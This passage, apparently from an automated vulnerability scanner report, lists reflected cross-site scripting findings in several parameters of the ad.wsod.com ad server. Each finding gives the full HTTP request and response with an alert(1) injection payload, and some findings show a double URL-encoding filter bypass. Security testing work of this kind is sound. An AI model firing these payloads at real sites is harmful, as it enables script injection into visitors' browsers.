Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       
...[SNIP]...

4.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

4.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 851

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

4.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683569**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683597**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf">
...[SNIP]...

4.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296683606**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in the REST URL parameter 2. This input was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135781851";alert(1)//aa8ae4a84fa/353.0.js.120x30/1296683666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f
...[SNIP]...

4.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in the REST URL parameter 3. This input was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8";alert(1)//7ebd7131956/1296683672**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9
...[SNIP]...

4.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
